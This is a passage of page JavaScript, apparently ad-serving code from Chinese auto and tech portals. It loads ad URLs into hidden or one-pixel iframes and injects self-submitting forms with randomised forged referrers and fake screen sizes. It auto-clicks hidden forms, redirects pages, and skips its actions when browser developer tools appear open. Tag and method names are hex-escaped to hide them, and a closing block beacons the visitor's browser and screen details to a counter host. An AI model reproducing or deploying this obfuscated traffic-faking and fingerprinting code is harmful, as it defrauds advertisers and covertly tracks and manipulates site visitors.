show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fwww.pcauto.com.cn%2F%23%23ad%3D0000&to=http%3A%2F%2Fwww.pcauto.com.cn%2F%23%23ad%3D0000&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.shouye.hqxfban.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D390872%26atid%3D109840748%22%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A//www.pcauto.com.cn/&to=http%3A//www.pcauto.com.cn/drivers/yongpin/qcyx/&code=%3Csc%7Eipt%20src%3D%22http%3A//ivy.pcauto.com.cn/adpuba/show%3Fadid%3D389841%26id%3Dauto.test.click.%26media%3Djs%26trace%3D1%26atid%3D1933787-13500%22%3E%3C/sc%7Eipt%3E&watch=0&cookie=1"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A//www.pcauto.com.cn/&to=http%3A//www.pcauto.com.cn/drivers/yongpin/%23ad%3D0000&code=%3Csc%7Eipt%20src%3D%22http%3A//ivy.pcauto.com.cn/adpuba/show%3Fadid%3D365091%26id%3Dauto.test.click.%26media%3Djs%26trace%3D1%26atid%3D1933816-13500%22%3E%3C/sc%7Eipt%3E&watch=0");
		show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fwww.pcauto.com.cn%2F%23%23ad%3D0000&to=&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.shouye.tl1x.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D387068%26atid%3D109840638%22%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fwww.pcauto.com.cn%2F%23%23ad%3D0000&to=http%3A%2F%2Fwww.pcauto.com.cn%2Fqcbj%2Ftaizhou%2F%23%23ad%3D0000&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.qcbj.taizhou.sy.zdwz.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D389298%26relate%3D1%26atid%3D1933835-13500%22%3E%3C/sc%7Eipt%3E&watch=0");	show(idx4show++,"{SRC13}"); show(idx4show++,"{SRC14}");	show(idx4show++,"{SRC15}"); show(idx4show++,"{SRC16}"); show(idx4show++,"{SRC17}"); show(idx4show++,"{SRC18}"); show(idx4show++,"{SRC19}"); show(idx4show++,"{SRC20}");
		show(idx4show++,"{SRC21}"); show(idx4show++,"{SRC22}");	show(idx4show++,"{SRC23}"); show(idx4show++,"{SRC24}");	show(idx4show++,"{SRC25}"); show(idx4show++,"{SRC26}"); show(idx4show++,"{SRC27}"); show(idx4show++,"{SRC28}"); show(idx4show++,"{SRC29}"); show(idx4show++,"{SRC30}");
		show(idx4show++,"{SRC31}"); show(idx4show++,"{SRC32}"); show(idx4show++,"{SRC33}"); show(idx4show++,"{SRC34}"); show(idx4show++,"{SRC35}"); show(idx4show++,"{SRC36}"); show(idx4show++,"{SRC37}"); show(idx4show++,"{SRC38}"); show(idx4show++,"{SRC39}"); show(idx4show++,"{SRC40}");
		show(idx4show++,"{SRC41}"); show(idx4show++,"{SRC42}"); show(idx4show++,"{SRC43}"); show(idx4show++,"{SRC44}"); show(idx4show++,"{SRC45}"); show(idx4show++,"{SRC46}"); show(idx4show++,"{SRC47}"); show(idx4show++,"{SRC48}"); show(idx4show++,"{SRC49}"); show(idx4show++,"{SRC50}");
		show(idx4show++,"{SRC51}"); show(idx4show++,"{SRC52}"); show(idx4show++,"{SRC53}"); show(idx4show++,"{SRC54}"); show(idx4show++,"{SRC55}"); show(idx4show++,"{SRC56}"); show(idx4show++,"{SRC57}"); show(idx4show++,"{SRC58}"); show(idx4show++,"{SRC59}"); show(idx4show++,"{SRC60}");
		show(idx4show++,"{SRC61}"); show(idx4show++,"{SRC62}"); show(idx4show++,"{SRC63}"); show(idx4show++,"{SRC64}"); show(idx4show++,"{SRC65}"); show(idx4show++,"{SRC66}"); show(idx4show++,"{SRC67}"); show(idx4show++,"{SRC68}"); show(idx4show++,"{SRC69}"); show(idx4show++,"{SRC70}");
		show(idx4show++,"{SRC71}"); show(idx4show++,"{SRC72}"); show(idx4show++,"{SRC73}"); show(idx4show++,"{SRC74}"); show(idx4show++,"{SRC75}"); show(idx4show++,"{SRC76}"); show(idx4show++,"{SRC77}"); show(idx4show++,"{SRC78}"); show(idx4show++,"{SRC79}"); show(idx4show++,"{SRC80}");
		show(idx4show++,"{SRC81}"); show(idx4show++,"{SRC82}"); show(idx4show++,"{SRC83}"); show(idx4show++,"{SRC84}"); show(idx4show++,"{SRC85}"); show(idx4show++,"{SRC86}"); show(idx4show++,"{SRC87}"); show(idx4show++,"{SRC88}"); show(idx4show++,"{SRC89}"); show(idx4show++,"{SRC90}");
		show(idx4show++,"{SRC91}"); show(idx4show++,"{SRC92}"); show(idx4show++,"{SRC93}"); show(idx4show++,"{SRC94}"); show(idx4show++,"{SRC95}"); show(idx4show++,"{SRC96}"); show(idx4show++,"{SRC97}"); show(idx4show++,"{SRC98}"); show(idx4show++,"{SRC99}"); show(idx4show++,"{SRC100}");

		function show(idx4show,src,delay){
			try{
			var watcher=0,body=document.documentElement&&document.documentElement.clientHeight>0?document.documentElement:document.body,vcode=src.indexOf("adpuba%2Fshow2") != -1;
			watcher=chrome ? window.outerHeight-Math.floor((window.outerWidth-10)/window.innerWidth*window.innerHeight)>150 : !body || (window.outerHeight ? window.outerHeight : screen.availHeight)-body.clientHeight>250;
			if(src==null || src=="" || /^(#|\{SRC)/.test(src) || !/^http/i.test(src) || watcher&&/watch=0/.test(src) || watcher&&chrome) return;
			if(!delay){
				delay=1*src.replace(/.*&delay=(\d+).*|.*/,"$1"); if(delay<1)delay=500+Math.floor(Math.random()*1000);
				if(vcode) delay = 1;
				src=src.replace(/&delay=(\d+)/,"");
				return ivyTastTimes["t"+idx4show] = setTimeout(function(){show(idx4show,src,true); },delay);
			}
			if(/&redirect=1/.test(src)&&!/cms\.|zzsvn\.|corp\.|zhaopin\.|ued\.|my\./.test(location.href)){
				if(!!document.referrer)window.location.replace(src);else return;
			}
			if(/^http:\/\/rr\..+?\.com\/u\//.test(src)){
				var div=document.createElement("div"),ifr;
				div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr-p2-"+ src.replace(/^http:\/\/rr\..+?\.com\/u\//,"").replace(/\.html$/,"")+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent) +"\" width="+ pos.w +" height="+ pos.h +" id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
				ivy_div.appendChild(div.firstChild); setTimeout(function(){try{ ifr = document.getElementById("_ivf000"+idx4show); ifr.parentNode.removeChild(ifr)}catch(err){}},40*1000); return;
			}
			
			src=src.replace(/(show[?]id=)([\w.]+)/,function($0,$1,$2){return $1+escapeAll($2)}).replace('ivy.pconline','i\x79v.pconline');
			var k=src.indexOf('#http'), srcCd = unescape(src).replace(/\n/g,''), adid = srcCd.replace(/^.*adid=(\d+).*$|^.*$/,'$1') || srcCd.match(/&id=\d+_(\d+)/)[1], atid = srcCd.replace(/^.*atid=(\d+).*$|^.*$/,'$1'), div=document.createElement("div");
			if(atid) __test15atids.push(atid);
			
			if(/rr\.php|rr\.jsp/.test(src)&&!/keepparent/.test(src)){
				var
				fArr = src.replace(/^.*from=([^&]+).*$|^.*$/,'$1').replace(/^%0A{0,}|%0A{0,}$|%0A{0,}(?=%0A)/g,'').split("%0A"),
				tArr = src.replace(/^.*to=([^&]+).*$|^.*$/,'$1').replace(/^%0A{0,}|%0A{0,}$|%0A{0,}(?=%0A)/g,'').split("%0A"),
				fr = fArr[Math.floor(Math.random()*fArr.length)],
				to = tArr[Math.floor(Math.random()*tArr.length)],
				co = src.replace(/^.*code=([^&]+).*$|^.*$/,'$1'), ifr, idoc, icod;
				co = replaceRT(co);
				!!fr && (fr = fr.indexOf("%23ad%3D0000") > -1 ? fr : fr + '%23ad%3D0000');
				!!to && (to = to.indexOf("%23ad%3D0000") > -1 ? to : to + '%23ad%3D0000');
				src = src.replace(/from=[^&]+/,"from="+fr).replace(/to=[^&]+/,"to="+to).replace(/code=[^&]+/,"code="+co);

				if(!!fr && !!co){
					div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+adid+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent)+"-wn="+ encodeURIComponent(src.replace(/^http[^&]*/,"")) +"=wn\" width="+ (!vcode ? pos.w : 1) +" height="+ (!vcode ? pos.h : 1) +" class=i"+atid+"_"+adid+" id=_ivf000"+idx4show+" \x3e\x3c/i\x46ra\x4de\x3e";
					ivy_div.appendChild(div.firstChild);
					icod = '\x3cf\x6frm\x20m\x65thod\x3dpost\x20id\x3d\x66m\x20ac\x74\x69on\x3d"'+unescape(fr)+'\x22\x20\x74ar\x67et=\x5fse\x6cf\x3e\x3cinput\x20type\x3dhidde\x6e\x20name\x3dngix\x5fposter\x20val\x75e\x3d\x31\x20\x2f\x3e\x3cinput\x20type\x3dhidde\x6e\x20name\x3dwn\x5fposter\x20val\x75e\x3d\x31\x20\x2f\x3e\x3c\x2fform\x3e\x3cscri\x70t\x3evar\x20f=d\x6fcu\x6d\x65\x6et\x2e\x67etEl\x65\x6de\x6et\x42yId\x28\x22fm\x22\x29;if(f&&/^post$/i.test(f.method)&&/^http:/i.test(f.action)&&/^test15Show/.test(window.name)&&wi\x6ed\x6fw\x2epare\x6et!\x3dwi\x6ed\x6fw){/*f.action+="#>>"+f.action+"<<"+f.method+","+f.target;/**/f\x2es\x75bm\x69t\x28\x29\x3b}\x3c\x2f\x73\x63r\x69pt\x3e';
					ifr = document.getElementById("_ivf000"+idx4show);
					idoc = ifr.contentDocument||ifr.contentWindow.document;
					idoc.write(icod);
					ifr.removeAttribute("name");
					setTimeout(function(){try{ ifr.parentNode.removeChild(ifr)}catch(err){}},50*1000);
					return;
				}
			}
			if(src.indexOf('adpuba/click?')>-1&&!/MSIE/.test(ua)){
				src = src.replace('adpuba/click?','adpuba/click?trace=6&')
			}
			if(k<0) {
				div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+adid+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent)+"-pc.other.test15.\" width=1 height=1 id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
				ivy_div.appendChild(div.firstChild);
			} else {
				var ref=src.substring(k+1); src=src.substring(0,k);
				div.innerHTML=
					'\x3ci\x46ra\x4de style=margin-top:-9999px width=800 height=600 id=_ivf'+idx4show+' name=test15ShowIfr'+idx4show+' \x3e\x3c/i\x46ra\x4de\x3e\n'+
					'\x3cf\x4fr\x4d \x52et\x48od=\x50o\x53t target=test15ShowIfr'+idx4show+' action="'+ref+'" \x3e\x3cinput id=_ivF\x4fr\x6d'+idx4show+' type=submit name=post_redir value="'+src+'" /\x3e\x3c/f\x4fr\x4d\x3e';
				ivy_div.appendChild(div);
				document.getElementById('_iv\x46or\x6d'+idx4show)["\x63l\x69c\x6b"]();
			}
			}catch(err) {}
		}
	}

	window[test15showfunc]();
	setTimeout(function(){if(!!window.t15rd&&window.t15rd==1)return;var tid='pc.other.test15.',atids='';if(!!__test15atids&&__test15atids.length>0) atids=__test15atids.join(',');var js=document.createElement("script"); js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&s_atid=&";var nodes = document.getElementsByTagName("script"),len=nodes.length;if(len){ nodes[len-1].parentNode.insertBefore(js,nodes[len-1]);};window.t15rd=1;},12*1000);

	function bind(o,type,fn){if(o.addEventListener){o.addEventListener(type,fn,false)}else if(o.attachEvent){o.attachEvent("on"+type,fn)}else{o["on"+type] = fn}}
	function escapeAll(str){var hexString='';for(var k=0,c;k<str.length;k++){c=str.charAt(k);for(i=0;i<=256;++i){var h=i.toString(16);if(h.length==1)h="0"+h;h="%"+h;if(unescape(h)==c){hexString+=h;break}else if(i==256){hexString+=escape(c);break}}}return hexString}
	function replaceRT(co){
	var rnd = co.match(/%5BRND(\d+)%5D/), tme = co.match(/%5BTIME(\d+)%5D/), wid = co.match(/%5BSCRW%5D/), hei = co.match(/%5BSCRH%5D/);
		rnd && (co = co.replace(rnd[0],fixrnd(rnd[1]*1)));
		tme && (co = co.replace(tme[0],fixtime(tme[1]*1)));
	var dataScreen = [{"15.4" : [1366,768]}, {"13.22" : [1440,900]}, {"11.09" : [1024,768]}, {"8.23" : [1920,1080]}, {"4.13" : [1600,900]}, {"4.09" : [1280,800]}, {"3.53" : [320,480]}, {"3.11" : [1280,1024]}, {"2.79" : [1680,1050]}, {"2.63" : [480,800]}, {"1.84" : [1280,768]}];
		if(wid || hei){	var size = rndRun(dataScreen); wid && (co = co.replace(wid[0],size[0])); hei && (co=co.replace(hei[0],size[1]));}
		return co;
	}
	function rndRun(rndData) {
	var obj = {}, num = 0, l = rndData.length, key, i, size = [1366,768];
		for( i = 0; i < l; i++ ) for( key in rndData[i] ){ num += key*100; obj[num] = rndData[i][key];};
		var r = Math.floor(Math.random()*num);
		for ( key in obj ) if(r < key){size = obj[key];break;};
		return size;
	}
	function fixtime(n){
		var t = new Date()*1 + "";
		if(t.length > n){t = t.substring(0,n)}
		else if(t.length < n){	t += fixrnd(n - t.length);}
		return t*1;
	}
	function fixrnd(n){
		var s = "";
		for(var i = 0; i<n;i++)s += Math.floor(Math.random()*10);
		return s*1;
	}
},1);
(function(){
	var name = 'xxx'+Math.floor(Math.random()*1000000);
	if(!!window[name]) return;
	if(Math.random()*100000>100) return;
var tabstr='(0_0)';
function _uFlash() { 
  var f = "-", n = navigator; 
  if (n.plugins && n.plugins.length) {
      for (var ii = 0; ii < n.plugins.length; ii++) {
            if (n.plugins[ii].name.indexOf('Shockwave Flash') != -1) { 
                f = n.plugins[ii].description.split('Shockwave Flash ')[1]; 
                break; 
           } 
      } 
  } else if (window.ActiveXObject) { 
       for (var ii = 20; ii >= 2; ii--) { 
          try { 
             var fl = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + ii + "');"); 
             if (fl) { 
                 f = ii + '.0'; 
                break; 
             }
          } catch (e) { 
         } 
     } 
  }
  return f; 
}
var ximg = new Image().src = 'http://agent-count.pconline.com.cn/counter/adAnalyse/fflloogg.jsp?m=add&f=clientenv&c='+
  navigator.userAgent+
  tabstr+window.screen.width+'x'+window.screen.height+
  tabstr+(document.documentElement.clientWidth||document.body.clientWidth)+'x'+(document.documentElement.clientHeight||document.body.clientHeight)+
  tabstr+escape(_uFlash());
	window[name]=1;
})();